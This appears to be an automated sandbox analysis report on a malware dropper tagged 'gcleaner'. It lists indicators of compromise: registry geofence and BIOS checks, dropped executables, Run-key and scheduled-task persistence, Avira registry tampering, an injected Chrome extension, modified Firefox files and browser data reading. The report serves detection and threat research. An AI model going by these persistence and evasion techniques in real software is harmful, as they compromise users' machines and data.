gcleaner | hxxps://mgen[.]fast-dl[.]cc/

System Information Discovery

Processes:

rundll32.exeRrZAYRw1y73jrdza.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RrZAYRw1y73jrdza.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

chrome.exeAYujpiU.exechrome.exeRrZAYRw1y73jrdza.exeFlKR.exechrome.exeFlKR.exechrome.exechrome.exechrome.exeFileDate44.exechrome.exeZxeJj.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	AYujpiU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	RrZAYRw1y73jrdza.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	FlKR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	FlKR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	FileDate44.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	ZxeJj.exe

Executes dropped EXE 36 IoCs

Processes:

is-5P4B1.tmpIC44.exeIC44.exeEgKQRibNDk7V.exeis-2T3L9.tmpZerkalo331.exe3qP1XX.exeis-KVFOL.tmpZerkalo331.exeFileDate44.exeRrZAYRw1y73jrdza.exe5x26G1xfk6ttI6.exeYH9UD8kMJQ.exeis-TE35S.tmpFlKR.exeZxeJj.exechromedriver.exechrome.exechrome.exeQcWrpBr.exechrome.exechrome.exechrome.exechrome.exeAYujpiU.exeFlKR.exeZxeJj.exechromedriver.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
2448	is-5P4B1.tmp
2232	IC44.exe
3160	IC44.exe
4124	EgKQRibNDk7V.exe
2132	is-2T3L9.tmp
5088	Zerkalo331.exe
1444	3qP1XX.exe
2620	is-KVFOL.tmp
4476	Zerkalo331.exe
4764	FileDate44.exe
2428	RrZAYRw1y73jrdza.exe
4536	5x26G1xfk6ttI6.exe
740	YH9UD8kMJQ.exe
4664	is-TE35S.tmp
4496	FlKR.exe
4496	FlKR.exe
2100	ZxeJj.exe
5060	chromedriver.exe
1224	chrome.exe
3352	chrome.exe
4088	QcWrpBr.exe
5016	chrome.exe
3404	chrome.exe
2400	chrome.exe
5564	chrome.exe
5560	AYujpiU.exe
5792	FlKR.exe
5648	ZxeJj.exe
1956	chromedriver.exe
4332	chrome.exe
4176	chrome.exe
2824	chrome.exe
3508	chrome.exe
5616	chrome.exe
3668	chrome.exe
5888	chrome.exe

Loads dropped DLL 64 IoCs

Processes:

is-5P4B1.tmpis-2T3L9.tmpis-KVFOL.tmp5x26G1xfk6ttI6.exe

pid	process
2448	is-5P4B1.tmp
2132	is-2T3L9.tmp
2620	is-KVFOL.tmp
2620	is-KVFOL.tmp
2620	is-KVFOL.tmp
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nsuA753.tmp\GetVersion.dll	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5x26G1xfk6ttI6.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run	5x26G1xfk6ttI6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\toc = "C:\\Users\\Admin\\AppData\\Roaming\\toc\\FlKR.exe"	5x26G1xfk6ttI6.exe

Checks for any installed AV software in registry 1 TTPs 10 IoCs

Security Software Discovery

T1063

Processes:

IC44.exeAYujpiU.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	IC44.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	AYujpiU.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira	AYujpiU.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	AYujpiU.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	AYujpiU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build = "BxoXastrd"	AYujpiU.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

AYujpiU.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\manifest.json	AYujpiU.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

AYujpiU.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini AYujpiU.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

269 api.ipify.org
270 api.ipify.org

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	AYujpiU.exe

flow	ioc
269	api.ipify.org
270	api.ipify.org

Drops file in System32 directory 27 IoCs

Processes:

RrZAYRw1y73jrdza.exeAYujpiU.exepowershell.exeQcWrpBr.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	RrZAYRw1y73jrdza.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	AYujpiU.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_F21BF538BAEA56C2FC86EE4A4D9AD2BF	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_AA1ADD4071D073F3048022453A5FE061	AYujpiU.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	QcWrpBr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AYujpiU.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	QcWrpBr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5038C0447BCAF9C6EE7F2D13E3E0DDAD	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_F21BF538BAEA56C2FC86EE4A4D9AD2BF	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_AA1ADD4071D073F3048022453A5FE061	AYujpiU.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	AYujpiU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5038C0447BCAF9C6EE7F2D13E3E0DDAD	AYujpiU.exe

Drops file in Program Files directory 64 IoCs

Processes:

is-TE35S.tmpAYujpiU.exeis-5P4B1.tmpis-2T3L9.tmpFlKR.exeZerkalo331.exe

description	ioc	process
File created	C:\Program Files (x86)\BRngBackup\is-RCGDM.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\xzDgZbVAMpcU2\xjczrfO.xml	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\unins000.dat	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-G9PSA.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\is-APR9F.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-GQV4D.tmp	is-2T3L9.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-CPCLL.tmp	is-2T3L9.tmp
File created	C:\Program Files (x86)\BRngBackup\is-BQR5T.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\ImageComparer\is-VOGLH.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-2T3L9.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-V7920.tmp	is-2T3L9.tmp
File created	C:\Program Files (x86)\BRngBackup\Languages\is-VDIUB.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-V5K3G.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\clFlow	FlKR.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	AYujpiU.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	AYujpiU.exe
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\p2pminimal.log	Zerkalo331.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-RCUEG.tmp	is-5P4B1.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\ImageComparer.url	is-5P4B1.tmp
File created	C:\Program Files (x86)\BRngBackup\is-7M8TR.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-MKK3F.tmp	is-TE35S.tmp
File created	C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi	AYujpiU.exe
File created	C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\UhFiQGt.xml	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\is-KS244.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-HC5QV.tmp	is-5P4B1.tmp
File opened for modification	C:\Program Files (x86)\BRngBackup\unins000.dat	is-TE35S.tmp
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\is-AJOBT.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-MKDO2.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-FQTED.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-JOK4A.tmp	is-5P4B1.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\unins000.dat	is-5P4B1.tmp
File created	C:\Program Files (x86)\BRngBackup\is-CTFGG.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\ImageComparer\is-2A2H1.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\is-7QC8A.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-66NUJ.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\BRngBackup\is-AFTQV.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\uXFrNnbxU\aDeAMwg.xml	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-AHMKU.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\is-0N4H6.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\uXFrNnbxU\HuZRJe.dll	AYujpiU.exe
File created	C:\Program Files (x86)\YyYjRnRkbVRlC\YGHYSNJ.dll	AYujpiU.exe
File created	C:\Program Files (x86)\zWoUVQYphcUn\vmgsxCh.dll	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-F770L.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-LULTL.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-M6P9P.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-2AJTR.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\is-C0U5R.tmp	is-TE35S.tmp
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-7ISRA.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-26321.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-S4G9T.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-4JUH1.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-V0OK5.tmp	is-2T3L9.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-TCVSE.tmp	is-2T3L9.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\IC44.exe	is-5P4B1.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-2T3L9.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe	is-2T3L9.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-U52OQ.tmp	is-TE35S.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-HMFPO.tmp	is-5P4B1.tmp
File created	C:\Program Files (x86)\BRngBackup\is-9EPVF.tmp	is-TE35S.tmp
File opened for modification	C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe	is-TE35S.tmp
File created	C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\mCTXxQP.dll	AYujpiU.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-OTSVS.tmp	is-5P4B1.tmp

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\rrfLLMZdwqFuiRyRk.job	schtasks.exe
File created	C:\Windows\Tasks\IHfUYafURfJPxJE.job	schtasks.exe
File created	C:\Windows\Tasks\sZfSYDKOGgdsigSHj.job	schtasks.exe
File created	C:\Windows\Tasks\bPLWYbEmiNLoeLgDZO.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 57 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2180	2232	WerFault.exe	IC44.exe
392	2232	WerFault.exe	IC44.exe
4108	2232	WerFault.exe	IC44.exe
684	3160	WerFault.exe	IC44.exe
432	3160	WerFault.exe	IC44.exe
5088	3160	WerFault.exe	IC44.exe
2236	3160	WerFault.exe	IC44.exe
3248	3160	WerFault.exe	IC44.exe
5076	3160	WerFault.exe	IC44.exe
4312	3160	WerFault.exe	IC44.exe
1200	3160	WerFault.exe	IC44.exe
1492	3160	WerFault.exe	IC44.exe
3900	3160	WerFault.exe	IC44.exe
180	3160	WerFault.exe	IC44.exe
2316	3160	WerFault.exe	IC44.exe
2900	3160	WerFault.exe	IC44.exe
3060	3160	WerFault.exe	IC44.exe
2628	3160	WerFault.exe	IC44.exe
2828	3160	WerFault.exe	IC44.exe
3536	3160	WerFault.exe	IC44.exe
884	3160	WerFault.exe	IC44.exe
2620	3160	WerFault.exe	IC44.exe
1908	3160	WerFault.exe	IC44.exe
4312	3160	WerFault.exe	IC44.exe
3772	3160	WerFault.exe	IC44.exe
4892	3160	WerFault.exe	IC44.exe
3000	3160	WerFault.exe	IC44.exe
3084	3160	WerFault.exe	IC44.exe
936	3160	WerFault.exe	IC44.exe
2900	3160	WerFault.exe	IC44.exe
3060	3160	WerFault.exe	IC44.exe
3944	3160	WerFault.exe	IC44.exe
4040	3160	WerFault.exe	IC44.exe
3268	3160	WerFault.exe	IC44.exe
3032	3160	WerFault.exe	IC44.exe
4908	3160	WerFault.exe	IC44.exe
3312	3160	WerFault.exe	IC44.exe
2100	3160	WerFault.exe	IC44.exe
3620	3160	WerFault.exe	IC44.exe
1168	3160	WerFault.exe	IC44.exe
1252	3160	WerFault.exe	IC44.exe
4332	3160	WerFault.exe	IC44.exe
1900	3160	WerFault.exe	IC44.exe
4796	3160	WerFault.exe	IC44.exe
212	3160	WerFault.exe	IC44.exe
1900	3160	WerFault.exe	IC44.exe
3876	3160	WerFault.exe	IC44.exe
1492	3160	WerFault.exe	IC44.exe
2288	3160	WerFault.exe	IC44.exe
4684	3160	WerFault.exe	IC44.exe
3444	3160	WerFault.exe	IC44.exe
3716	3160	WerFault.exe	IC44.exe
3560	3160	WerFault.exe	IC44.exe
4148	3160	WerFault.exe	IC44.exe
2760	3160	WerFault.exe	IC44.exe
5052	3160	WerFault.exe	IC44.exe
1992	3160	WerFault.exe	IC44.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4420	schtasks.exe
4184	schtasks.exe
4972	schtasks.exe
5792	schtasks.exe
5484	schtasks.exe
5248	schtasks.exe
756	schtasks.exe
320	schtasks.exe
2316	schtasks.exe
6140	schtasks.exe
3712	schtasks.exe
5840	schtasks.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exeRrZAYRw1y73jrdza.exerundll32.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RrZAYRw1y73jrdza.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	RrZAYRw1y73jrdza.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4640 taskkill.exe

pid	process
4640	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeAYujpiU.exerundll32.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	AYujpiU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	AYujpiU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
